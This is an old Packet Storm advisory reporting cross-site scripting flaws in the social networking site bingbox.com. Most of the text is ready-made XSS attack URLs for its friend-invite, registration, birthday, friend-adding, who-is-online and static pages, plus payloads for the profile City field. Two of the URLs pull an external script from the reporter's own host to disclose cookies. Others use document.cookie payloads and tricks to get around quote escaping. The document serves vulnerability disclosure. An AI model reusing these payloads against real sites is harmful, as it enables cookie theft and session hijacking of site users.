bingbox.txt

2006-06-26T00:00:00
ID PACKETSTORM:47647
Type packetstorm
Reporter Luny
Modified 2006-06-26T00:00:00

Description

                                        
                                            `Bingbox.com  
  
Homepage:  
http://www.bingbox.com  
  
Affected files:  
  
* Profile input boxes:  
  
- City input  
  
* Registering  
  
* Viewing Birthdays  
  
* Adding a friend  
  
* Viewing people online  
-----------------------------------------------  
  
XSS with cookie disclosure via inviting friends:  
http://www.bingbox.com/go/admin/f=friends&o=invite&a=msn&t=web&wizard=start">">">">">'>'>'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<  
  
"<"<'<'<'  
  
XSS vuln with cookie disclosure via "City" input box on profile:  
  
Data isnt properly sanatized before being generated. In one part of the site its output as full code on the screen (tested using <img> tags, with <table> tags, no   
  
code displays), and on the other part, an XSS can occur:  
  
For a PoC, since they add backslashes to ' and ", use the long UTF-8 Unicode for ':  
  
<TABLE BACKGROUND=javascript:alert(&#0000039XSS&#0000039)>  
  
For the cookie:  
  
<TABLE BACKGROUND=javascript:alert(document.cookie)>  
  
--------------------------------------------------  
  
XSS with cookie disclosure when viewing a blog, that redirects you to the register page:  
  
http://bingbox.com/go/register/wanted=luny666/">">">">">">'>'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<'<'<"<"  
  
-----------------------------------------------  
  
XSS via viewing birthdays:  
  
http://www.bingbox.com/go/birthdays/month=8&day=13">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><  
  
"<"  
  
-------------------------------------------------  
  
XSS when adding a new friend. Same as above, we arent able to use ' or long UTF-8 unicode above, so we use fromCharCode's. PoC:  
  
http://www.bingbox.com/go/admin/f=friends&o=new&friendname=DreamUnik">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))  
  
><"<"<"<"<'<'<'<"<""><"<"  
  
--------------------------------------------------  
  
XSS vuln when viewing people online:  
  
http://www.bingbox.com/go/whoisonline/i=1&agemin=&agemax=&country=US">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))  
  
><"<"<"<"<'<'<'<"<""><"<"&locationarea=&sex=&page=3  
  
------------------------------------------------  
  
More XSS vulns:  
  
http://www.bingbox.com/go/static/file=av">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><  
http://www.bingbox.com/go/static/file=ps">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><  
http://www.bingbox.com/go/static/file=gedragscode">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><  
  
  
Screenshots:  
http://www.youfucktard.com/xsp/bingbox1.jpg  
http://www.youfucktard.com/xsp/bingbox2.jpg  
http://www.youfucktard.com/xsp/bingbox3.jpg  
http://www.youfucktard.com/xsp/bingbox4.jpg  
http://www.youfucktard.com/xsp/bingbox5.jpg  
http://www.youfucktard.com/xsp/bingbox6.jpg  
http://www.youfucktard.com/xsp/bingbox7.jpg  
http://www.youfucktard.com/xsp/bingbox8.jpg  
`